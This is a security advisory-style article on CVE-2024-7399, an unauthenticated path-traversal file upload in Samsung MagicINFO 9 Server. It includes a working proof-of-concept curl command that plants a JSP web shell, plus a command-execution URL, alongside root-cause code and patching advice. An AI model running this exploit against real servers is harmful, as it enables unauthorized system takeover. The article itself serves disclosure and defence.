A severe security vulnerability (CVE-2024-7399) has been discovered in Samsung’s MagicINFO 9 Server, a widely used digital signage content management system, allowing unauthenticated attackers to execute arbitrary code with system-level privileges.
This flaw, rated with the maximum CVSS score of 9.8, exposes organizations to the risk of total server compromise and has already been observed exploited in the wild.
Vulnerability Overview
The vulnerability resides in the /MagicInfo/servlet/SWUpdateFileUploader endpoint, implemented by the SWUpdateFileUploadServlet class. This endpoint:
- Does not require authentication for file uploads.
- Accepts a
fileNameparameter without proper validation or extension checking. - Fails to neutralize path traversal sequences, allowing attackers to write files to arbitrary server locations.
Root Cause
The endpoint constructs file paths by concatenating a constant directory, a timestamp, and the user-supplied fileName parameter:
javaString savedFileName = System.currentTimeMillis() + fileName;
swUpdateFilePath = swUpdateFileFolderPath + File.separator + savedFileName;
This lack of input sanitization enables attackers to upload malicious JSP files (web shells) to executable locations on the server, leading to remote code execution with system privileges.
Proof of Concept Exploit
A typical attack involves sending a crafted POST request to the vulnerable endpoint, uploading a JSP web shell:
bashcurl -kis -H "Content-Type: text/plain" \
--data-binary "<%@ page import=\"java.util.*,java.io.*\"%><pre><% Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } %></pre>" \
"https://$MAGIC_INFO_SERVER:7002/MagicInfo/servlet/SWUpdateFileUploader?fileName=./../../../../../../server/shell.jsp&deviceType=abc&deviceModelName=test&swVer=123"
Once uploaded, an attacker can execute system commands remotely:
texthttps://$MAGIC_INFO_SERVER:7002/MagicInfo/shell.jsp?cmd=cmd.exe+/c+whoami
Risk Factor Table
| Risk Factor | Description | Severity |
|---|---|---|
| Authentication Bypass | No authentication required to exploit the vulnerability | Critical |
| Arbitrary File Upload | Attackers can upload files (including web shells) anywhere on the server | Critical |
| Remote Code Execution | Uploaded files can be executed with SYSTEM-level privileges | Critical |
| Path Traversal | File paths are not sanitized, allowing placement in unauthorized server locations | High |
| Public Exploit Available | Proof-of-concept code is publicly accessible, lowering the barrier for attackers | High |
| Exploitation Observed | Active exploitation in the wild has been confirmed | High |
| Impact Scope | Affects all MagicINFO 9 Server versions prior to 21.1050, widely deployed in many sectors | High |
Remediation and Recommendations
Samsung has released a fix in MagicINFO 9 Server version 21.1050. Organizations are strongly advised to:
- Upgrade to version 21.1050 or later immediately.
- Audit server logs for suspicious file uploads and access to unexpected JSP files.
- Restrict network access to MagicINFO servers where possible.
Given the ease of exploitation, public availability of attack code, and the critical impact, this vulnerability poses a significant threat to organizations using Samsung MagicINFO 9 Server. Prompt patching and vigilance are essential to mitigate risk.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates
%20(1).webp?w=1200&resize=1200,0&ssl=1&description=This flaw, rated with the maximum CVSS score of 9.8, exposes organizations to the risk of total server compromise and has already been observed exploited in the wild.){kind=link}